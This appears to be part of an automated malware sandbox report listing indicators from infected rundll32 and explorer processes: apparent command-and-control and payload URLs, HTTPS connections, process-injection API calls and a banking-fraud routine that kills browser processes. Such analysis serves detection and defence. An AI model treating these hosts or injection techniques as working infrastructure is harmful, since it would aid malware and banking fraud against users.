            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/gop.php
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/gop.php5
            Source: rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/gop.php6)
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/gop.phpK
            Source: rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/gop.phpn)?
            Source: rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huanvn.com:6542/stop.php
            Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4550686972.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3101269732.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3100576777.0000000009B8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: explorer.exe, 00000008.00000000.2325776934.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4553248554.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
            Source: explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/
            Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C912000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/files/stkm.bin
            Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C912000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/files/stkm.binSL
            Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/files/stkm.bino
            Source: explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/p
            Source: explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/q
            Source: explorer.exe, 00000008.00000003.3864470409.0000000003534000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/
            Source: explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/1303063_94378682313560_2056837URLS1https://dogirafer.com/test/4190877_54
            Source: explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/3630449_22862766669148_5703346URLS1https://dogirafer.com/test/6092916_19
            Source: explorer.exe, 00000008.00000003.3201304277.00000000030C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/4439042_94940942440575_5318539URLS1https://dogirafer.com/test/3185439_50
            Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/4560
            Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/4560D
            Source: explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/9362058_57969102112118_633157URLS1https://dogirafer.com/test/8477611_767
            Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/X
            Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/t60G
            Source: explorer.exe, 00000008.00000003.3863706304.0000000003532000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3864470409.0000000003534000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reateberam.com/test/w
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com/
            Source: rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com/%
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com/W
            Source: rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com:6542/gop.php
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com:6542/stop.php
            Source: rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com:6542/stop.phpo
            Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vutarf.com:6542/stop.phpu
            Source: explorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
            Source: explorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
            Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
            Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
            Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
            Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
            Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
            Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
            Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
            Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
            Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
            Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
            Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
            Source: unknownHTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49907 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49941 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49950 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:49972 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:50006 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:50029 version: TLS 1.2

            E-Banking Fraud

            barindex
            Checks if browser processes are running
            Source: C:\Windows\explorer.exeCode function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, chrome.exe8_2_0E454948
            Source: C:\Windows\explorer.exeCode function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, iexplore.exe8_2_0E454948
            Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\System32\rundll32.exeCode function: 3_3_000001CEAFE2D2B6 NtAllocateVirtualMemory,3_3_000001CEAFE2D2B6
            Source: C:\Windows\System32\rundll32.exeCode function: 3_3_000001CEAFE2D326 NtProtectVirtualMemory,3_3_000001CEAFE2D326
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFCA4BE0 NtProtectVirtualMemory,3_2_000001CEAFCA4BE0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFCA4FF0 NtQueueApcThread,3_2_000001CEAFCA4FF0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC717B0 NtClose,NtClose,3_2_000001CEAFC717B0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFCA4360 NtCreateThreadEx,3_2_000001CEAFCA4360
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFCA4740 NtFreeVirtualMemory,3_2_000001CEAFCA4740
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFCA3F40 NtAllocateVirtualMemory,3_2_000001CEAFCA3F40
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC87A50 NtSetContextThread,3_2_000001CEAFC87A50
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC71600 NtClose,RtlExitUserThread,3_2_000001CEAFC71600
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC88149 NtSetContextThread,3_2_000001CEAFC88149
            Source: C:\Windows\System32\rundll32.exeCode function: 4_3_00000276197BD326 NtProtectVirtualMemory,4_3_00000276197BD326
            Source: C:\Windows\System32\rundll32.exeCode function: 4_3_00000276197BD2B6 NtAllocateVirtualMemory,4_3_00000276197BD2B6
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196271B0 NtClose,4_2_00000276196271B0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000027619638149 NtSetContextThread,4_2_0000027619638149
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000027619654BE0 NtProtectVirtualMemory,4_2_0000027619654BE0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000027619654FF0 NtQueueApcThread,4_2_0000027619654FF0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196217B0 NtClose,NtClose,4_2_00000276196217B0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000027619654360 NtCreateThreadEx,4_2_0000027619654360
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000027619653F40 NtAllocateVirtualMemory,4_2_0000027619653F40
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000027619654740 NtFreeVirtualMemory,4_2_0000027619654740
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000027619621600 NtClose,RtlExitUserThread,4_2_0000027619621600
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000027619637A50 NtSetContextThread,4_2_0000027619637A50
            Source: C:\Windows\System32\rundll32.exeCode function: 6_3_000002339FC7D2B6 NtAllocateVirtualMemory,6_3_000002339FC7D2B6
            Source: C:\Windows\System32\rundll32.exeCode function: 6_3_000002339FC7D326 NtProtectVirtualMemory,6_3_000002339FC7D326
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBB4360 NtCreateThreadEx,6_2_000002339FBB4360
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB817B0 NtClose,NtClose,6_2_000002339FB817B0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBB3F40 NtAllocateVirtualMemory,6_2_000002339FBB3F40
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBB4740 NtFreeVirtualMemory,6_2_000002339FBB4740
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB81600 NtClose,RtlExitUserThread,6_2_000002339FB81600
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB97A50 NtSetContextThread,6_2_000002339FB97A50
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB98149 NtSetContextThread,6_2_000002339FB98149
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBB4FF0 NtQueueApcThread,6_2_000002339FBB4FF0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBB4BE0 NtProtectVirtualMemory,6_2_000002339FBB4BE0
            Source: C:\Windows\explorer.exeCode function: 8_2_0303C704 NtDelayExecution,8_2_0303C704
            Source: C:\Windows\explorer.exeCode function: 8_2_0303B388 NtAllocateVirtualMemory,8_2_0303B388
            Source: C:\Windows\explorer.exeCode function: 8_2_030382B4 NtFreeVirtualMemory,8_2_030382B4
            Source: C:\Windows\explorer.exeCode function: 8_2_030401A0 NtFreeVirtualMemory,8_2_030401A0
            Source: C:\Windows\explorer.exeCode function: 8_2_030381C8 NtWriteFile,8_2_030381C8
            Source: C:\Windows\explorer.exeCode function: 8_2_03038240 NtClose,8_2_03038240
            Source: C:\Windows\explorer.exeCode function: 8_2_030380B8 RtlInitUnicodeString,NtCreateFile,8_2_030380B8
            Source: C:\Windows\explorer.exeCode function: 8_2_083882B4 NtFreeVirtualMemory,8_2_083882B4
            Source: C:\Windows\explorer.exeCode function: 8_2_0838B388 NtAllocateVirtualMemory,8_2_0838B388
            Source: C:\Windows\explorer.exeCode function: 8_2_08388240 NtClose,8_2_08388240
            Source: C:\Windows\explorer.exeCode function: 8_2_083880B8 RtlInitUnicodeString,NtCreateFile,8_2_083880B8
            Source: C:\Windows\explorer.exeCode function: 8_2_0838C704 NtDelayExecution,8_2_0838C704
            Source: C:\Windows\explorer.exeCode function: 8_2_083901A0 NtFreeVirtualMemory,8_2_083901A0
            Source: C:\Windows\explorer.exeCode function: 8_2_083881C8 NtWriteFile,8_2_083881C8
            Source: C:\Windows\explorer.exeCode function: 8_2_088582B4 NtFreeVirtualMemory,8_2_088582B4
            Source: C:\Windows\explorer.exeCode function: 8_2_0885B388 NtAllocateVirtualMemory,8_2_0885B388
            Source: C:\Windows\explorer.exeCode function: 8_2_088580B8 RtlInitUnicodeString,NtCreateFile,8_2_088580B8
            Source: C:\Windows\explorer.exeCode function: 8_2_08858240 NtClose,8_2_08858240
            Source: C:\Windows\explorer.exeCode function: 8_2_088601A0 NtFreeVirtualMemory,8_2_088601A0
            Source: C:\Windows\explorer.exeCode function: 8_2_088581C8 NtWriteFile,8_2_088581C8
            Source: C:\Windows\explorer.exeCode function: 8_2_0885C704 NtDelayExecution,8_2_0885C704
            Source: C:\Windows\explorer.exeCode function: 8_2_0E45241C NtAllocateVirtualMemory,8_2_0E45241C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E45248C NtFreeVirtualMemory,8_2_0E45248C
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D56B7C: CreateFileW,DeviceIoControl,CloseHandle,3_2_00007FF8A8D56B7C
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CFDA48 CreateEnvironmentBlock,GetLastError,_invalid_parameter_noinfo,_invalid_parameter_noinfo,DestroyEnvironmentBlock,GetSystemDirectoryW,PathAddBackslashW,swprintf,CreateProcessAsUserW,GetLastError,CloseHandle,CloseHandle,3_2_00007FF8A8CFDA48
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D069A03_2_00007FF8A8D069A0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D2E90C3_2_00007FF8A8D2E90C
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DD9AF03_2_00007FF8A8DD9AF0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CFFA783_2_00007FF8A8CFFA78
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DE4A203_2_00007FF8A8DE4A20
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D0BA283_2_00007FF8A8D0BA28
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D179F83_2_00007FF8A8D179F8
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DCBB1C3_2_00007FF8A8DCBB1C
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CFDCBC3_2_00007FF8A8CFDCBC
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CFBCB83_2_00007FF8A8CFBCB8
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D09C5C3_2_00007FF8A8D09C5C
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D7AC003_2_00007FF8A8D7AC00
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CFEDE03_2_00007FF8A8CFEDE0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D09D8C3_2_00007FF8A8D09D8C
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D1BEDC3_2_00007FF8A8D1BEDC
